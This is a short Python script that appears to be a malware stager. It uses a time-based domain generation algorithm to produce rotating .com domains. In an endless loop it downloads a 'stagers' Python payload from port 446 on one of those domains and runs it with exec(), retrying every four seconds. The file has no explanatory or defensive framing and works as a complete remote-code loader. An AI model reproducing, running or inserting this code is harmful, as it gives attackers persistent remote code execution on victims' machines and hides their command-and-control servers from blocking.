
def dga() -> list:
    """Generate 10 domains for the given time."""
    domain_list = []
    domain = ""
    import math, datetime
    today = datetime.datetime.utcnow()
    year = today.year
    month = today.month
    minute = today.minute
    minute = int(math.ceil(minute/5))*5

    for i in range(16):
        year = ((year ^ 8 * year) >> 11) ^ ((year & 0xFFFFFFF0) << 17)
        month = ((month ^ 4 * month) >> 25) ^ 16 * (month & 0xFFFFFFF8)
        minute = ((minute ^ (minute << 13)) >> 19) ^ ((minute & 0xFFFFFFFE) << 12)
        domain += chr(((year ^ month ^ minute) % 25) + 97)
        if i > 6:
            domain_list.append(domain+ ".com")

    return domain_list


import random,sys,zlib,base64,marshal,json,urllib, time
if sys.version_info[0] > 2:
    from urllib import request

while True:
    time.sleep(4)
    try:
        domain_list = dga()
        domain = random.choice(domain_list)
        dropper_url = 'http://'+domain+':446//stagers/b6H.py'

        urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
        exec(urlopen(dropper_url).read())
    except Exception:
        print("[*] Connection error with domain {}, retrying...".format(domain))
        continue


